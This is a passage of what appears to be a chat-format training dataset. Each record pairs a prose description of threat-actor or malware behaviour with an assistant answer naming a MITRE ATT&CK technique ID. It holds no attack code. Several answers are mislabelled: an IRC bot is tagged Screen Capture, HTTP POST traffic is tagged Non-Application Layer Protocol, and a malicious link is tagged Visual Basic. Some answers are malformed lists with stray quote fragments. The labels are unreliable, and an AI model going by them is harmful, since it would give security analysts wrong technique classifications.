- "content": "Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On a different system, operators dropped a legitimate copy of credwize.exe, the Microsoft Credential Backup and Restore Wizard, on disk and used it to execute the malicious library New.dll, another Turian variant"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish persistence by creating a .lnk file in the Start menu."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has made use of Python-based remote access tools."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bluetooth functionality in Flamer is encoded in a module called \"BeetleJuice\". This module is triggered according to configuration values set by the attacker. This means that a computer compromised by W32.Flamer will appear when any other Bluetooth device scans the local area. In addition to enabling a Bluetooth beacon, Flamer encodes details about the infected computer (see Figure 1) and then stores these details in a special 'description' field. When any other device scans for Bluetooth-enabled devices, this description field will be displayed: These are the facts of how Flamer uses Bluetooth. The attacker, however, could identify the location of compromised devices using Bluetooth. The Beetlejuice module already has retrieved a list of all the devices IDs which are near to the infected computer and so the attacker knows what devices belong to the victim. Some attacks have even identified Bluetooth devices more than one mile away. With increase functionality an attacker, having identified various Bluetooth devices in range, could perform numerous attacks: - Steal contacts from an address book, steals SMS messages, steals images, and more. An attacker within one mile of the target could use their own Bluetooth-enabled device for this. If the second computer is using a secured network and was infected through a USB connection, potentially the only network available would be a Bluetooth connection back to the first compromised computer"
- },
- {
- "role": "assistant",
- "content": "T1011.001 - Exfiltration Over Bluetooth"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This exception invokes the exception handler containing the HTTP communication code, allowing it to run"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa used AES-128 to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has leveraged a zero-day vulnerability to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linux Rabbit attempts to gain access to the server via SSH."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used a screen capture utility to take screenshots on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit', 'T1542.001 - Pre-OS Boot: System Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used pass the hash for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork developed a file stealer to search C:\\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pasam creates a backdoor through which remote attackers can delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can execute \"FileRecvWriteRand\" to append random bytes to the end of a file received from C2."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has collected various files from the compromised computers."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has attempted to lure victims into executing malicious files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, ‘minerescape’ contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as /usr/bin/dns_ipv4.tar.gz) which is the file /usr/bin/bioset. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). The father is responsible for deciphering messages and writing it back to the child on the PIPE. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). - The father is responsible for deciphering messages and writing it back to the child on the PIPE. Logging the activity and encoding it into files (using Base64). - Defense Evasion: Deleting command history. Logging the activity and encoding it into files (using Base64). Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Logging the activity and encoding it into files (using Base64). - Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Encoding many snippets with base64 (the same snippet may be encoded multiple times). To sum it up . Over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can enumerate the username on targeted hosts."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscates C2 communication using a 1-byte XOR with the key 0xBE."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD can use Registry Run Keys for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower has the ability to identify the current user on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has attempted to lure victims into opening malicious email attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has encrypted C2 traffic with RSA."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands on the victim."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT sets \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" to point to its executable."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP POST requests with data formatted using a custom protocol."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter used the Windows function \"GetExtendedUdpTable\" to detect connected UDP endpoints."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the /C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1055.012 - Process Injection: Process Hollowing', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "samples have been signed with a code-signing certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Download & execute Startup (with persistence) Collection of system information (OS, version, installed location, etc.) Self-update Uninstall This project was created by a user called zettabithf which is linked to a user with the same name in Hack Forums"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has constructed legitimate appearing installation folder paths by calling \"GetWindowsDirectoryW\" and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as \"C:\\Users\\Public\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The output of the downloaded batch file is saved to “%PUBLIC%\\Libraries\\tp\\<batch filename>.txt”. The script will then upload the output of this batch file by including the data in a sequence of DNS queries. The exfiltrates the output of the batch script by splitting up the data within the text file into chunks up to 23 bytes and sends the data within a series of DNS queries that have the following structure"
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reg may be used to find credentials in the Windows Registry."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can change the timestamp of specified filenames."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial DNS query sent by the payload to obtain the system specific identifier uses the following structure, which includes the current process identifier (PID) as the subdomain of the C2 domain: . The C2 server will provide the system specific identifier within the answer portion of the DNS response"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HARDRAIN binds and listens on port 443 with a FakeTLS method."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec harvests plain-text credentials as a password filter registered on domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1556.002 - Modify Authentication Process: Password Filter DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used PowerShell scripts to access credential data."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has created a run key named \"Dropbox Update Setup\" to mask a persistence mechanism for a malicious binary."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo can collect screenshots of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and Ursnif."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Truvasys adds a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of running services with the command \"tasklist /svc\"."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data"
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can obtain the username from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon further inspection, Kroll learned that an employee using their work computer had clicked on a malicious link from their personal email account that downloaded a Qakbot dropper"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When we deploy any web browser, it directly injects the code into its process and deploys illegitimate connections.It is the way to keep in touch with the C&C, monitor user’s activity and steal credentials"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it"
- },
- {
- "role": "assistant",
- "content": "T1072 - Software Deployment Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can add or remove applications or ports on the Windows firewall or disable it entirely."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following functions are called when the application attempts to initialize the menu:ETransaksi.Speed(); // Legitimate class, but method is the first wrapped function that leads to malicious code ProjectData.EndApp(); // Closes the application before rest of legitimate Sales System Application functions are calledThe “Speed” method in the legitimate ETransaksi class contains legitimate code from the Sales System Application; however, the author of this tool includes this code in an if/else construct that bypasses these instructions by setting a false flag to skip the legitimate code and execute the next step to the malicious code"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1036 - Masquerading', 'T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "email with an embedded tracking link"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
